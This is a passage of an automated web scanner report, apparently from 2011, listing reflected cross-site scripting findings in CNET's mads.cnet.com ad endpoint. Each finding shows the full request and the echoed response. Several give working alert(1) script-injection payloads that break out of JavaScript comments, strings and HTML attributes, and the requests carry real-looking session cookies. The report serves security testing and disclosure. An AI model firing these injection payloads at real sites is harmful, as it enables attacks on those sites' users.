Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:33:51 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:33:51 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%2093406<a>7fc7d9d19ca&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _RE
...[SNIP]...

6.38. http://mads.cnet.com/mac-ad [NCAT parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the NCAT request parameter is copied into the HTML document as plain text between tags. The payload 4a259<a>912498d9b9d was submitted in the NCAT parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A4a259<a>912498d9b9d&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:10 GMT
Server: Apache/2.2
Content-Length: 623
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:32:10 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A4a259<a>912498d9b9d&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&
...[SNIP]...

6.39. http://mads.cnet.com/mac-ad [NODE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the NODE request parameter is copied into the HTML document as plain text between tags. The payload 189d8<a>f55d6ee52e0 was submitted in the NODE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939189d8<a>f55d6ee52e0&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:28 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:36:28 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939189d8<a>f55d6ee52e0&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BE
...[SNIP]...

6.40. http://mads.cnet.com/mac-ad [OS parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the OS request parameter is copied into the HTML document as plain text between tags. The payload 2e8ff<a>c8d172ed6c1 was submitted in the OS parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%202e8ff<a>c8d172ed6c1&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:22 GMT
Server: Apache/2.2
Content-Length: 605
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:35:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%202e8ff<a>c8d172ed6c1&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATU
...[SNIP]...

6.41. http://mads.cnet.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript inline comment. The payload 65376*/alert(1)//b31b0eb50c was submitted in the PAGESTATE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=65376*/alert(1)//b31b0eb50c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:25 GMT
Server: Apache/2.2
Content-Length: 665
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:25 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=65376*/alert(1)//b31b0eb50c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAA
...[SNIP]...

6.42. http://mads.cnet.com/mac-ad [PAGESTATE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PAGESTATE request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53302'%3balert(1)//3364702832c was submitted in the PAGESTATE parameter. This input was echoed as 53302';alert(1)//3364702832c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=53302'%3balert(1)//3364702832c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:22 GMT
Server: Apache/2.2
Content-Length: 669
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:22 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=53302'%3balert(1)//3364702832c&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE
...[SNIP]...
jttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP BEACON CALL (SITE='109' PTYPE='8300' NCAT='17939:' CID='2' TO BEACON TEXT) */;window.CBSI_PAGESTATE='53302';alert(1)//3364702832c';/* MAC [r20101202-0915-v1-13-13-JsonEncodeNewLine:1.13.13] phx1-ad-xw2.cnet.com::1544677696 2011.05.04.01.31.22 *//* MAC T 0.1.1.1 */

6.43. http://mads.cnet.com/mac-ad [PTYPE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the PTYPE request parameter is copied into the HTML document as plain text between tags. The payload fba4a<a>4b18f579c72 was submitted in the PTYPE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300fba4a<a>4b18f579c72&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:32:41 GMT
Server: Apache/2.2
Content-Length: 621
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:32:41 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300fba4a<a>4b18f579c72&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&co
...[SNIP]...

6.44. http://mads.cnet.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the HTML document as plain text between tags. The payload 5b774<a>074a9b55b75 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1095b774<a>074a9b55b75&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:35 GMT
Server: Apache/2.2
Content-Length: 617
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Type: application/x-javascript
Expires: Wed, 04 May 2011 01:31:35 GMT

/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=1095b774<a>074a9b55b75&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=
...[SNIP]...

6.45. http://mads.cnet.com/mac-ad [SITE parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the SITE request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d576a"><script>alert(1)</script>9bc12335b1 was submitted in the SITE parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3d576a"><script>alert(1)</script>9bc12335b1&ADSTYLE=NOOVERGIF&_RGROUP=13060 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:30:40 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:30:40 GMT
Content-Length: 2132

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<a href="http://adlog.com.com/adlog/c/r=13060&amp;sg=513174&amp;o=&amp;h=cn&amp;p=2&amp;b=5&amp;l=en_US&amp;site=3d576a"><script>alert(1)</script>9bc12335b1&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=00phx1-ad-e21:4DC0A4E3789E4&amp;orh=admeld.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&am
...[SNIP]...

6.46. http://mads.cnet.com/mac-ad [_RGROUP parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the _RGROUP request parameter is copied into an HTML comment. The payload 9aac9--><a>a4ec2a29964 was submitted in the _RGROUP parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /mac-ad?CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=130609aac9--><a>a4ec2a29964 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/489/cnetnews/300x250/cnetnews_atf?t=1304490531988&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fcbsinteractive.com&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tempSessionId=Cg5gp024kOetwdbzqyU; XCLGFbrowser=Cg8JIk24ijttAAAASDs; cnet_joinCallout=true; wsFd=true; arrowFdCounter=-1; arrowQr_3=0.43558634360494813:0.23844470593739045:0.26487749137224303:0.06109145908541855; arrowQrIt_3=1; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10174&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10287&ASK05540_10290&ASK05540_10354&ASK05540_10394&ASK05540_10395&ASK05540_10537&ASK05540_10562; cnet_rvpCallout=3; arrowLrps=1303946351887:1303941361935; arrowLat=1304472529769; arrowSpc=1; MADTEST=1

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:21 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html
Expires: Wed, 04 May 2011 01:31:21 GMT
Content-Length: 1687

<!-- MAC ad -->
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>CNET ad iframe content</title>
<style
...[SNIP]...
<!-- NO AD TEXT: _QUERY_STRING="CELT=ifc&BRAND=5&SITE=3&ADSTYLE=NOOVERGIF&_RGROUP=130609aac9--><a>a4ec2a29964" _REQ_NUM="0" -->
...[SNIP]...

6.47. http://mads.cnet.com/mac-ad [cookiesOn parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://mads.cnet.com
Path:   /mac-ad

Issue detail

The value of the cookiesOn request parameter is copied into the HTML document as plain text between tags. The payload e9cb9<a>a068ebd640a was submitted in the cookiesOn parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=109&NCAT=17939%3A&PTYPE=8300&CID=2&MFG=%20&ATTR=%20&CARRIER=%20&OS=%20&BRAND=5&NODE=17939&CNET-PAGE-GUID=LcGErAoOYI4AAGp4RtMAAAIs&cookiesOn=1e9cb9<a>a068ebd640a&DVAR_INSTLANG=en-US&COOKIE%3AANON_ID=Cg8JIk24ijttAAAASDs&x-cb=2382531&ADREQ&beacon=1&cookiesOn=1 HTTP/1.1
Host: mads.cnet.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
